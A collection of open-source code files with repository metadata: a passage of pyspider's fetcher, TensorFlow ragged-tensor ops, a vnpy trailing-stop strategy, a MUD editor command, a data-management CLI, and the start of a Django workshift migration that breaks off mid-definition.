"url": url,
"cookies": {},
"time": 0,
"save": task.get('fetch', {}).get('save')
}
logger.warning("[501] %s 0s", url)
callback('http', task, result)
self.on_result('http', task, result)
return task, result
request_conf = {
'follow_redirects': False
}
fetch = dict(self.default_options)
fetch.setdefault('url', url)
fetch.setdefault('headers', {})
task_fetch = task.get('fetch', {})
fetch.update(task_fetch)
if 'timeout' in fetch:
request_conf['connect_timeout'] = fetch['timeout']
request_conf['request_timeout'] = fetch['timeout']
fetch['headers'].setdefault('User-Agent', self.user_agent)
start_time = time.time()
def handle_response(response):
if not response:
result = {
'status_code': 599,
'error': "599 Timeout error",
'content': "",
'time': time.time() - start_time,
'orig_url': url,
'url': url,
}
else:
try:
result = json.loads(response.body)
except Exception as e:
result = {
'status_code': 599,
'error': '%r' % e,
'content': '',
'time': time.time() - start_time,
'orig_url': url,
'url': url,
}
if result.get('status_code', 200):
logger.info("[%d] %s %.2fs", result['status_code'], url, result['time'])
else:
logger.exception("[%d] %s, %r %.2fs", result['status_code'],
url, result['content'], result['time'])
callback('phantomjs', task, result)
self.on_result('phantomjs', task, result)
return task, result
try:
request = tornado.httpclient.HTTPRequest(
url="%s" % self.phantomjs_proxy, method="POST",
body=json.dumps(fetch), **request_conf)
if self.async:
response = self.http_client.fetch(request, handle_response)
else:
return handle_response(self.http_client.fetch(request))
except tornado.httpclient.HTTPError as e:
return handle_response(e.response)
except Exception as e:
result = {
'status_code': 599,
'error': "%r" % e,
'content': '',
'time': time.time() - start_time,
'orig_url': url,
'url': url,
}
logger.error("[599] %s, %r %.2fs", url, e, result['time'])
callback('phantomjs', task, result)
self.on_result('phantomjs', task, result)
return task, result
def run(self):
def queue_loop():
if not self.outqueue or not self.inqueue:
return
while not self._quit:
try:
if self.outqueue.full():
break
if self.http_client.free_size() <= 0:
break
task = self.inqueue.get_nowait()
self.fetch(task)
except Queue.Empty:
break
except KeyboardInterrupt:
break
except Exception, e:
logger.exception(e)
break
tornado.ioloop.PeriodicCallback(queue_loop, 100).start()
self._running = True
try:
tornado.ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
pass
logger.info("fetcher exiting...")
def size(self):
return self.http_client.size()
def quit(self):
self._running = False
self._quit = True
tornado.ioloop.IOLoop.instance().stop()
def xmlrpc_run(self, port=24444, bind='127.0.0.1', logRequests=False):
import umsgpack
from SimpleXMLRPCServer import SimpleXMLRPCServer
from xmlrpclib import Binary
server = SimpleXMLRPCServer((bind, port), allow_none=True, logRequests=logRequests)
server.register_introspection_functions()
server.register_multicall_functions()
server.register_function(self.quit, '_quit')
server.register_function(self.size)
def sync_fetch(task):
result = self.sync_fetch(task)
result = Binary(umsgpack.packb(result))
return result
server.register_function(sync_fetch, 'fetch')
def dump_counter(_time, _type):
return self._cnt[_time].to_dict(_type)
server.register_function(dump_counter, 'counter')
server.timeout = 0.5
while not self._quit:
server.handle_request()
server.server_close()
def on_fetch(self, type, task):
"""type in ('data', 'http')"""
pass
def on_result(self, type, task, result):
"""type in ('data', 'http')"""
status_code = result.get('status_code', 599)
if status_code != 599:
status_code = (int(status_code) / 100 * 100)
self._cnt['5m'].event((task.get('project'), status_code), +1)
self._cnt['1h'].event((task.get('project'), status_code), +1)
if type == 'http' and result.get('time'):
content_len = len(result.get('content', ''))
self._cnt['5m'].event((task.get('project'), 'speed'), float(content_len)/result.get('time'))
self._cnt['1h'].event((task.get('project'), 'speed'), float(content_len)/result.get('time'))
self._cnt['5m'].event((task.get('project'), 'time'), result.get('time'))
self._cnt['1h'].event((task.get('project'), 'time'), result.get('time'))
|
{
"content_hash": "f7757da07afd7d33482346640647c7b6",
"timestamp": "",
"source": "github",
"line_count": 421,
"max_line_length": 110,
"avg_line_length": 38.32541567695962,
"alnum_prop": 0.5089556863960335,
"repo_name": "jorik041/pyspider",
"id": "9e1564886e344b63aa022863c5aac83c9b2ec56f",
"size": "16320",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pyspider/fetcher/tornado_fetcher.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "20906"
},
{
"name": "HTML",
"bytes": "19066"
},
{
"name": "JavaScript",
"bytes": "32832"
},
{
"name": "Python",
"bytes": "260158"
}
],
"symlink_target": ""
}
|
"""Ops to convert between RaggedTensors and other tensor types."""
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_ragged_conversion_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.ragged import ragged_tensor
def from_tensor(tensor,
                lengths=None,
                padding=None,
                ragged_rank=1,
                row_splits_dtype=dtypes.int64,
                name=None):
  """Returns `tensor` unchanged if already ragged, else converts it to ragged."""
  if ragged_tensor.is_ragged(tensor):
    return tensor
  return ragged_tensor.RaggedTensor.from_tensor(
      tensor,
      lengths=lengths,
      padding=padding,
      ragged_rank=ragged_rank,
      row_splits_dtype=row_splits_dtype,
      name=name)
def to_tensor(rt_input, default_value=None, name=None):
  """Converts `rt_input` to dense when it is ragged; passes it through otherwise."""
  if not ragged_tensor.is_ragged(rt_input):
    return rt_input
  return rt_input.to_tensor(default_value, name)
def ragged_to_dense(rt_input, default_value=None, shape=None):
  """Create a dense tensor from a ragged tensor."""
  dense = rt_input.to_tensor(default_value=default_value, shape=shape)
  return dense
@ops.RegisterGradient("RaggedTensorToTensor")
def _ragged_tensor_to_tensor_grad(op, grad):
"""Gradient for RaggedToTensor op."""
# Extract inputs from the op.
flat_values = op.inputs[1]
default_value = op.inputs[2]
row_partition_tensors = op.inputs[3:]
row_partition_types = op.get_attr("row_partition_types")
flat_value_shape = array_ops.shape(flat_values)
ragged_rank = sum(
1 for typ in row_partition_types if typ != b"FIRST_DIM_SIZE")
# Create two tensors that correspond 1:1 with grad (and op.output):
# * indices[i1...iN] is the index in `flat_values` of the value used to
# populate output[i1...iN] (if the value came from `flat_values`) or
# -1 (if the value came from `default_value`).
# * mask[i1...iN] is true if output[i1...iN] came from `flat_values`, or
# false if it came from `default_value`.
indices = gen_ragged_conversion_ops.ragged_tensor_to_tensor(
shape=array_ops.shape(grad)[:1 + ragged_rank],
values=math_ops.range(flat_value_shape[0]),
default_value=-1,
row_partition_types=row_partition_types,
row_partition_tensors=row_partition_tensors)
mask = math_ops.not_equal(indices, -1)
# Select out the gradients & indices that came from `flat_values`, and use
# those to construct the gradient for `flat_values` (as an IndexedSlices).
values_grad = indexed_slices.IndexedSlices(
values=array_ops.boolean_mask(grad, mask),
indices=array_ops.boolean_mask(indices, mask),
dense_shape=flat_value_shape)
# Select out the gradients that came from `default_value`, and sum them to
# get the gradient for the default. Note that the default_value may have
# been broadcast as part of the RaggedTensorToTensor operation, so we also
# need to reduce any dimensions that might have been broadcast.
default_grads = array_ops.boolean_mask(grad, ~mask)
dims_to_reduce = math_ops.range(
array_ops.rank(default_grads) -
_rank_ignoring_leading_dims_with_size_1(default_value))
default_grad = math_ops.reduce_sum(default_grads, axis=dims_to_reduce)
# Restore any leading dims with size one.
default_grad = array_ops.reshape(default_grad, array_ops.shape(default_value))
return ([None, values_grad, default_grad] +
[None for _ in row_partition_tensors])
def _rank_ignoring_leading_dims_with_size_1(value):
"""Returns `rank(value)`, ignoring any leading dimensions with size 1."""
# Compute the result using static shape, if possible.
if value.shape.rank is not None:
ndims = value.shape.rank
for dim in value.shape.dims:
if dim.value == 1:
ndims -= 1
elif dim.value is None:
ndims = None # Can't compute the result using static shape.
break
else:
break
if ndims is not None:
return ndims
# Otherwise, we need to compute the result dynamically. The math we use to
# do this is a bit round-about, so here's an example to illustrate:
# shape = [1, 1, 3, 5, 1, 4] # shape(value)
# dim_is_one = [1, 1, 0, 0, 1, 0] # equal(shape, 1)
# leading_ones = [1, 1, 0, 0, 0, 0] # cumprod(dim_is_one)
# num_leading_ones = 2 # reduce_sum(leading_ones)
# result = 4 # rank(value) - num_leading_ones
shape = array_ops.shape(value)
dim_is_one = math_ops.cast(math_ops.equal(shape, 1), dtypes.int32)
leading_ones = math_ops.cumprod(dim_is_one)
num_leading_ones = math_ops.reduce_sum(leading_ones)
return array_ops.rank(value) - num_leading_ones
def to_sparse(rt_input, name=None):
  """Converts `rt_input` to a `SparseTensor` via its `to_sparse` method."""
  result = rt_input.to_sparse(name)
  return result
def from_sparse(st_input, name=None):
  """Builds a `RaggedTensor` from the sparse tensor `st_input`."""
  converter = ragged_tensor.RaggedTensor.from_sparse
  return converter(st_input, name)
@ops.RegisterGradient("RaggedTensorFromVariant")
def _ragged_tensor_from_variant_grad(op, *grads):
"""Gradient for RaggedTensorFromVariant op."""
variant_rank = op.inputs[0].shape.rank
if variant_rank == 0:
batched_input = False
elif variant_rank == 1:
batched_input = True
elif variant_rank is None:
batched_input = (op.get_attr("output_ragged_rank") > 0)
else:
# TODO(edloper): Add a batch_dims argument to RaggedTensorToVariant, so
# we can support this.
raise ValueError("Unable to compute gradient: RaggedTensorToVariant "
"can currently only generate 0D or 1D output.")
return [
gen_ragged_conversion_ops.ragged_tensor_to_variant(
rt_nested_splits=op.outputs[:-1],
rt_dense_values=grads[-1],
batched_input=batched_input)
]
@ops.RegisterGradient("RaggedTensorToVariant")
def _ragged_tensor_to_variant_grad(op, encoded_ragged_grad):
"""Gradient for RaggedTensorToVariant op."""
dense_values = op.inputs[-1]
ragged_rank = len(op.inputs) - 1
row_splits = 0 if ragged_rank == 0 else op.inputs[0]
values_grad = gen_ragged_conversion_ops.ragged_tensor_to_variant_gradient(
encoded_ragged_grad=encoded_ragged_grad,
row_splits=row_splits,
dense_values_shape=array_ops.shape(dense_values),
Tvalues=op.inputs[-1].dtype)
result = [None] * ragged_rank + [values_grad]
return result
|
{
"content_hash": "8d302eaddbd4fee981cb7087dc18a63f",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 80,
"avg_line_length": 38.51204819277108,
"alnum_prop": 0.6788675113405287,
"repo_name": "gautam1858/tensorflow",
"id": "e71f5cad7929fc034eaa2bad2f6b81110c36b1ed",
"size": "7082",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "tensorflow/python/ops/ragged/ragged_conversion_ops.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "47492"
},
{
"name": "C",
"bytes": "1129549"
},
{
"name": "C#",
"bytes": "13496"
},
{
"name": "C++",
"bytes": "116904214"
},
{
"name": "CMake",
"bytes": "165809"
},
{
"name": "Cython",
"bytes": "5003"
},
{
"name": "Dockerfile",
"bytes": "341994"
},
{
"name": "Go",
"bytes": "2052513"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "1053827"
},
{
"name": "JavaScript",
"bytes": "5772"
},
{
"name": "Jupyter Notebook",
"bytes": "787371"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "9549263"
},
{
"name": "Makefile",
"bytes": "2760"
},
{
"name": "Objective-C",
"bytes": "180638"
},
{
"name": "Objective-C++",
"bytes": "295149"
},
{
"name": "Pawn",
"bytes": "5336"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "43775271"
},
{
"name": "Roff",
"bytes": "5034"
},
{
"name": "Ruby",
"bytes": "7854"
},
{
"name": "Shell",
"bytes": "566970"
},
{
"name": "Smarty",
"bytes": "89664"
},
{
"name": "SourcePawn",
"bytes": "8509"
},
{
"name": "Starlark",
"bytes": "6897556"
},
{
"name": "Swift",
"bytes": "78435"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
}
|
"""
移动止损策略:对从策略进行移动止损操作
请按命名规则在策略配置文件中配置
"""
from __future__ import division
from vnpy.app.cta_strategy.ctaTemplatePatch import CtaTemplatePatch
import copy
########################################################################
class TrailingStopStrategy(CtaTemplatePatch):
"""移动止损策略"""
className = 'TrailingStopStrategy'
author = u'renxg'
# 止损变量
intraTradeHigh = 0
intraTradeLow = 0
intraTradeHighDateTime = None
intraTradeLowDateTime = None
longStop = 0
shortStop = 0
stopOrderList = None
exitOnTopRtnPips = 0.008
halfTime = 60
slaveStrategy = None
slaveTradeIndex = 0 #区分从策略持仓,以此来感知仓位变换
# 参数列表,保存了参数的名称
parameters = CtaTemplatePatch.parameters + ['exitOnTopRtnPips', 'halfTime']
# 变量列表,保存了变量的名称
variables = CtaTemplatePatch.variables + [
'intraTradeHigh', 'intraTradeLow', 'longStop', 'shortStop',
'slaveTradeIndex', 'intraTradeHighDateTime', 'intraTradeLowDateTime'
]
#----------------------------------------------------------------------
# ----------------------------------------------------------------------
def __init__(self, cta_engine, strategy_name, vt_symbol, setting):
""""""
super().__init__(cta_engine, strategy_name, vt_symbol, setting)
self.stopOrderList = []
# self.tag = (hash(self.name) % 1e+5) * 1e-10
# self.write_log( u'Tag: {:.10f}'.format(self.tag))
#----------------------------------------------------------------------
def on_start(self):
"""启动策略(必须由用户继承实现)"""
super().on_start()
# 重设止损单
if self.trading:
if self.getSlaveStrategy():
if abs(self.slaveStrategy.pos):
self.setStopOrder()
#----------------------------------------------------------------------
def on_tick(self, tick):
"""收到行情TICK推送(必须由用户继承实现)"""
super().on_tick(tick)
if self.trading:
if self.getSlaveStrategy():
#设置从策略持有期内的最高价、最低价
if abs(
self.slaveStrategy.pos
) and self.slaveStrategy.tradeIndex == self.slaveTradeIndex:
# 计算持有期内的最高价
self.intraTradeHigh = max(self.intraTradeHigh,
tick.lastPrice)
self.intraTradeLow = min(self.intraTradeLow,
tick.lastPrice)
if self.intraTradeHigh == tick.lastPrice:
self.intraTradeHighDateTime = tick.datetime
if self.intraTradeLow == tick.lastPrice:
self.intraTradeLowDateTime = tick.datetime
else:
#重置
self.intraTradeHigh = tick.lastPrice
self.intraTradeLow = tick.lastPrice
self.slaveTradeIndex = self.slaveStrategy.tradeIndex
self.intraTradeHighDateTime = tick.datetime
self.intraTradeLowDateTime = tick.datetime
#----------------------------------------------------------------------
def on_bar(self, bar):
'''处理分钟数据'''
super().on_bar(bar)
if self.trading:
if self.getSlaveStrategy():
#设置从策略持有期内的最高价、最低价
if abs(
self.slaveStrategy.pos
) and self.slaveStrategy.tradeIndex == self.slaveTradeIndex:
# 计算持有期内的最高价
self.intraTradeHigh = max(self.intraTradeHigh, bar.high_price)
self.intraTradeLow = min(self.intraTradeLow, bar.low_price)
if self.intraTradeHigh == bar.high_price:
self.intraTradeHighDateTime = bar.datetime
if self.intraTradeLow == bar.low_price:
self.intraTradeLowDateTime = bar.datetime
else:
#重置
self.intraTradeHigh = bar.high_price
self.intraTradeLow = bar.low_price
self.slaveTradeIndex = self.slaveStrategy.tradeIndex
self.intraTradeHighDateTime = bar.datetime
self.intraTradeLowDateTime = bar.datetime
if abs(self.slaveStrategy.pos):
self.setStopOrder()
#----------------------------------------------------------------------
def onXminBar(self, bar):
"""收到K线推送"""
super(TrailingStopStrategy, self).onXminBar(bar)
if not self.trading:
return
if not self.am.inited:
return
#----------------------------------------------------------------------
def on_stop(self):
"""停止策略(必须由用户继承实现)"""
#如果已经设置移动止损单,撤消
for orderID in self.stopOrderList:
self.slaveStrategy.cancel_order(orderID)
self.stopOrderList = []
super().on_stop()
#----------------------------------------------------------------------
def getSlaveStrategy(self):
'''取被保护策略'''
if not self.slaveStrategy:
lockName = self.strategy_name.split('_Cover')[0]
if lockName in self.cta_engine.strategyDict:
self.slaveStrategy = self.cta_engine.strategyDict[lockName]
else:
self.write_log(u'策略 %s 没找到' % lockName)
return self.slaveStrategy
pass
#----------------------------------------------------------------------
    def setStopOrder(self):
        """Place/refresh the trailing stop that protects the slave strategy's position."""
        pos = self.slaveStrategy.pos
        trading = self.slaveStrategy.trading
        if trading:
            # If trailing stop orders were already placed, cancel them first.
            for orderID in self.stopOrderList:
                self.slaveStrategy.cancel_order(orderID)
            self.stopOrderList = []
            # Trailing stop: the allowed pull-back decays geometrically
            # (factor 0.8 per `halfTime` minutes since the last extreme).
            if self.exitOnTopRtnPips > 0:
                halfT = self.halfTime
                # Holding a long position.
                if pos > 0:
                    if self.intraTradeHighDateTime:
                        pips = self.exitOnTopRtnPips * 0.8**(
                            (self.lastDatetime -
                             self.intraTradeHighDateTime).seconds / 60 / halfT)
                        longStop = int(self.intraTradeHigh * (1 - pips))
                    else:
                        longStop = int(
                            self.intraTradeHigh * (1 - self.exitOnTopRtnPips))
                    # Send a local stop order and keep its id(s) for later cancellation.
                    self.stopOrderList = self.slaveStrategy.sell(
                        longStop, abs(pos), stop=True)
                    self.longStop = longStop
                # Holding a short position.
                elif pos < 0:
                    # Compute the short-side trailing stop.
                    if self.intraTradeLowDateTime:
                        pips = self.exitOnTopRtnPips * 0.8**(
                            (self.lastDatetime -
                             self.intraTradeLowDateTime).seconds / 60 / halfT)
                        shortStop = int(self.intraTradeLow * (1 + pips))
                    else:
                        shortStop = int(
                            self.intraTradeLow * (1 + self.exitOnTopRtnPips))
                    self.stopOrderList = self.slaveStrategy.cover(
                        shortStop, abs(pos), stop=True)
                    self.shortStop = shortStop
                else:
                    # Flat: reset the recorded stop prices.
                    self.longStop = 0
                    self.shortStop = 0
|
{
"content_hash": "cf6eacb999165a191ed3d5c7edc31e75",
"timestamp": "",
"source": "github",
"line_count": 202,
"max_line_length": 82,
"avg_line_length": 37.381188118811885,
"alnum_prop": 0.46656072043437957,
"repo_name": "bigdig/vnpy",
"id": "6ed3a91345fb87f25b70451150d56a276e0855ac",
"size": "8173",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vnpy/app/cta_strategy/strategies/strategyTrailingStop.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "390"
},
{
"name": "C",
"bytes": "1652953"
},
{
"name": "C++",
"bytes": "13737810"
},
{
"name": "Objective-C",
"bytes": "1200"
},
{
"name": "Python",
"bytes": "2979947"
},
{
"name": "Shell",
"bytes": "6050"
}
],
"symlink_target": ""
}
|
"""Package contenant la commande 'pedit'."""
from primaires.interpreteur.commande.commande import Commande
class CmdPedit(Commande):
    """The 'pedit' command: opens the PNJ (NPC) prototype editor."""
    def __init__(self):
        """Configure the command's name, access group, schema and help texts."""
        Commande.__init__(self, "pedit", "pedit")
        self.groupe = "administrateur"
        self.schema = "<ident>"
        self.nom_categorie = "batisseur"
        self.aide_courte = "ouvre l'éditeur de PNJ"
        self.aide_longue = \
            "Cette commande ouvre l'éditeur de PNJ permettant de créer et " \
            "éditer des prototypes de PNJ. Notez bien que vous n'éditez " \
            "pas directement le PNJ mais bien son prototype."
    def interpreter(self, personnage, dic_masques):
        """Interpret the command: fetch or create the prototype, then open the editor."""
        importeur = type(self).importeur
        ident_pnj = dic_masques["ident"].ident
        prototypes = importeur.pnj.prototypes
        # Reuse an existing prototype; otherwise create a new one on the fly.
        if ident_pnj in prototypes:
            prototype = prototypes[ident_pnj]
        else:
            prototype = importeur.pnj.creer_prototype(ident_pnj)
        editeur = importeur.interpreteur.construire_editeur(
            "pedit", personnage, prototype)
        personnage.contextes.ajouter(editeur)
        editeur.actualiser()
|
{
"content_hash": "00be591929b74b8bdd8d29f73512351c",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 77,
"avg_line_length": 39.9375,
"alnum_prop": 0.622848200312989,
"repo_name": "vlegoff/tsunami",
"id": "1460948e28a22a847192c273eebe7fd1806c9b80",
"size": "2855",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/primaires/pnj/commandes/pedit/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "7930908"
},
{
"name": "Ruby",
"bytes": "373"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import logging
import argparse
import unittest
import os
# Set up logger for the sub-commands to use.
# Note that this setup must occur before the other modules are imported.
# Code stub courtesy of http://stackoverflow.com/questions/7621897/python-logging-module-globally
log_formatter = logging.Formatter(
    fmt="[%(levelname)s] %(asctime)s (%(module)s:%(lineno)d): %(message)s")
log_handler = logging.StreamHandler()
log_handler.setFormatter(log_formatter)
# All sub-commands share the 'data' logger.  Propagation is disabled so
# messages are not duplicated by handlers attached to the root logger.
data_logger = logging.getLogger('data')
data_logger.setLevel(logging.INFO)
data_logger.addHandler(log_handler)
data_logger.propagate = False
from models import create_tables, init_database
from fetch import queries, results, results_content, histories, stack_overflow_questions, issues,\
issue_comments, issue_events, slant_topics, slant_pros_and_cons
from import_ import stackoverflow
from compute import code, npm_packages, post_tags, python_snippets, tasks
from migrate import run_migration
from dump import node_post_stats, package_top_queries, pattern_snippets, popular_tag_post_stats,\
slant_community_pros_and_cons
# Registry of top-level sub-commands.  Each entry maps a command name to:
#   description: help text for the command's argument parser
#   module_help: help text for its module sub-parser
#   modules:     modules that expose configure_parser() and main()
COMMANDS = {
    'fetch': {
        'description': "Fetch data from the web.",
        'module_help': "Type of data to fetch.",
        'modules': [
            histories, queries, results, results_content, stack_overflow_questions, issues,
            issue_comments, issue_events, slant_topics, slant_pros_and_cons
        ],
    },
    'import': {
        'description': "Import data from a local data source.",
        'module_help': "Type of data to import.",
        'modules': [stackoverflow],
    },
    'compute': {
        'description': "Compute derived fields from existing data.",
        'module_help': "Type of data to compute.",
        'modules': [code, npm_packages, post_tags, python_snippets, tasks],
    },
    'migrate': {
        'description':
            "Manage database migrations. (Should only be necessary if you initialized " +
            "your database and then the model files were updated.)",
        'module_help': "Migration operation.",
        'modules': [run_migration],
    },
    'dump': {
        'description': "Dump data to a JSON file.",
        'module_help': "Type of data to dump.",
        'modules': [
            node_post_stats, pattern_snippets, package_top_queries, popular_tag_post_stats,
            slant_community_pros_and_cons
        ],
    },
}
def run_tests(*args, **kwargs):
    """Discover and run every unit test found under the current directory."""
    discovered = unittest.defaultTestLoader.discover(os.getcwd())
    runner = unittest.TextTestRunner()
    runner.run(discovered)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Manage data for software packages.")
    subparsers = parser.add_subparsers(help="Sub-commands for managing data", dest='command')
    # Build a two-level CLI: one parser per top-level command, and one
    # sub-parser per module that implements that command.
    for command, command_spec in COMMANDS.items():
        command_parser = subparsers.add_parser(command, description=command_spec['description'])
        command_subparsers = command_parser.add_subparsers(help=command_spec['module_help'])
        for module in command_spec['modules']:
            # Each low-level module gets a sub-parser named after its file name.
            module_basename = module.__name__.split('.')[-1]
            module_parser = command_subparsers.add_parser(module_basename)
            # Default database options shared by every module.
            module_parser.add_argument(
                '--db',
                default='sqlite',
                help="which type of database to use (postgres, sqlite). Defaults to sqlite."
            )
            module_parser.add_argument(
                '--db-config',
                help="Name of file containing database configuration."
            )
            # Each module defines additional arguments
            module.configure_parser(module_parser)
            module_parser.set_defaults(func=module.main)
    # Add command for running unit tests
    test_parser = subparsers.add_parser('tests', description="Run unit tests.")
    test_parser.set_defaults(func=run_tests)
    args = parser.parse_args()
    # Sub-parsers are optional in argparse, so 'func' (and '--db') are missing
    # from the namespace when no module was selected; the original code then
    # crashed with AttributeError.  Show usage and exit instead.
    func = getattr(args, 'func', None)
    if func is None:
        parser.print_help()
        raise SystemExit(1)
    # Initialize database
    if args.command != 'tests':
        init_database(args.db, config_filename=args.db_config)
        create_tables()
    # Invoke the main program that was specified by the submodule
    func(**vars(args))
|
{
"content_hash": "6c702d54b24a28e5d183a6299ed41960",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 98,
"avg_line_length": 38.21848739495798,
"alnum_prop": 0.6561125769569042,
"repo_name": "andrewhead/Package-Qualifiers",
"id": "71d2389b433f1a05494041ae980b3d4fefb3e5c0",
"size": "4596",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "data.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "142908"
},
{
"name": "Shell",
"bytes": "782"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models, migrations
import workshift.fields
from django.conf import settings
class Migration(migrations.Migration):
    """Initial schema for the workshift app (auto-generated by Django).

    Creates the core workshift models (instance info, pool hours, regular
    shifts and their instances, semesters, shift log entries, time blocks,
    pools, member profiles, ratings and shift types) plus their foreign
    keys, many-to-many relations and unique constraints.  Do not edit the
    operation payloads by hand.
    """
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('managers', '0002_auto_20140801_1108'),
    ]
    operations = [
        migrations.CreateModel(
            name='InstanceInfo',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(help_text='Title for this shift.', max_length=255, null=True, blank=True)),
                ('description', models.TextField(help_text='Description of the shift.', null=True, blank=True)),
                ('verify', models.CharField(default='O', help_text='Who is able to mark this shift as completed.', max_length=1, choices=[('W', 'Workshift Managers only'), ('P', 'Pool Managers only'), ('M', 'Any Manager'), ('O', 'Another member'), ('S', 'Any member (including self)'), ('A', 'Automatically verified')])),
                ('start_time', models.TimeField(help_text='Start time for this workshift.', null=True, blank=True)),
                ('end_time', models.TimeField(help_text='End time for this workshift.', null=True, blank=True)),
                ('week_long', models.BooleanField(default=False, help_text='If this shift is for the entire week.')),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='PoolHours',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('hours', models.DecimalField(default=5, help_text='Periodic hour requirement.', max_digits=5, decimal_places=2)),
                ('standing', models.DecimalField(default=0, help_text='Current hours standing, below or above requirement.', max_digits=5, decimal_places=2)),
                ('hour_adjustment', models.DecimalField(default=0, help_text='Manual hour requirement adjustment.', max_digits=5, decimal_places=2)),
                ('last_updated', models.DateTimeField(help_text="When the last time the system updated this workshifter's standings.", null=True, blank=True)),
                ('first_date_standing', models.DecimalField(decimal_places=2, default=0, max_digits=5, blank=True, help_text='The hourly fines or repayment at the first fine date. Stored in a field for manual adjustment.', null=True)),
                ('second_date_standing', models.DecimalField(decimal_places=2, default=0, max_digits=5, blank=True, help_text='The hourly fines or repayment at the second fine date. Stored in a field for manual adjustment.', null=True)),
                ('third_date_standing', models.DecimalField(decimal_places=2, default=0, max_digits=5, blank=True, help_text='The hourly fines or repayment at the third fine date. Stored in a field for manual adjustment.', null=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='RegularWorkshift',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('day', workshift.fields.DayField(blank=True, max_length=1, null=True, help_text='The day of the week when this workshift takes place.', choices=[(0, 'Monday'), (1, 'Tuesday'), (2, 'Wednesday'), (3, 'Thursday'), (4, 'Friday'), (5, 'Saturday'), (6, 'Sunday')])),
                ('count', models.PositiveSmallIntegerField(default=1, help_text='Number of instances to create with each occurrence.', max_length=4)),
                ('hours', models.DecimalField(default=5, help_text='Number of hours for this shift.', max_digits=5, decimal_places=2)),
                ('active', models.BooleanField(default=True, help_text='Whether this shift is actively being used currently (displayed in list of shifts, given hours, etc.).')),
                ('start_time', models.TimeField(help_text='Start time for this workshift.', null=True, blank=True)),
                ('end_time', models.TimeField(help_text='End time for this workshift.', null=True, blank=True)),
                ('verify', models.CharField(default='O', help_text='Who is able to mark this shift as completed.', max_length=1, choices=[('W', 'Workshift Managers only'), ('P', 'Pool Managers only'), ('M', 'Any Manager'), ('O', 'Another member'), ('S', 'Any member (including self)'), ('A', 'Automatically verified')])),
                ('week_long', models.BooleanField(default=False, help_text='If this shift is for the entire week.')),
                ('addendum', models.TextField(default='', help_text='Addendum to the description for this workshift.')),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Semester',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('season', models.CharField(default='Sp', help_text='Season of the year (spring, summer, fall) of this semester.', max_length=2, choices=[('Sp', 'Spring'), ('Su', 'Summer'), ('Fa', 'Fall')])),
                ('year', models.PositiveSmallIntegerField(help_text='Year of this semester.', max_length=4)),
                ('rate', models.DecimalField(help_text='Workshift rate for this semester.', null=True, max_digits=7, decimal_places=2, blank=True)),
                ('policy', models.URLField(help_text='Link to the workshift policy for this semester.', max_length=255, null=True, blank=True)),
                ('start_date', models.DateField(help_text='Start date of this semester.')),
                ('end_date', models.DateField(help_text='End date of this semester.')),
                ('preferences_open', models.BooleanField(default=False, help_text='Whether members can enter their workshift preferences.')),
                ('current', models.BooleanField(default=True, help_text='If this semester is the current semester.')),
                ('workshift_managers', models.ManyToManyField(to=settings.AUTH_USER_MODEL, blank=True)),
            ],
            options={
                'ordering': ['-start_date'],
            },
            bases=(models.Model,),
        ),
        # A semester is uniquely identified by its season within a year.
        migrations.AlterUniqueTogether(
            name='semester',
            unique_together=set([('season', 'year')]),
        ),
        migrations.CreateModel(
            name='ShiftLogEntry',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('entry_time', models.DateTimeField(help_text='Time this entry was made.', auto_now_add=True)),
                ('hours', models.DecimalField(help_text='Hours associated with a change in workshift credit.', null=True, max_digits=5, decimal_places=2, blank=True)),
                ('note', models.TextField(help_text="Message to the workshift manager. (e.g. 'Can't cook because of flu')", null=True, blank=True)),
                ('entry_type', models.CharField(default='V', max_length=1, choices=[('A', 'Assigned'), ('B', 'Blown'), ('I', 'Sign In'), ('O', 'Sign Out'), ('V', 'Verify'), ('M', 'Modify Hours'), ('S', 'Sell')])),
            ],
            options={
                'ordering': ['-entry_time'],
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='TimeBlock',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
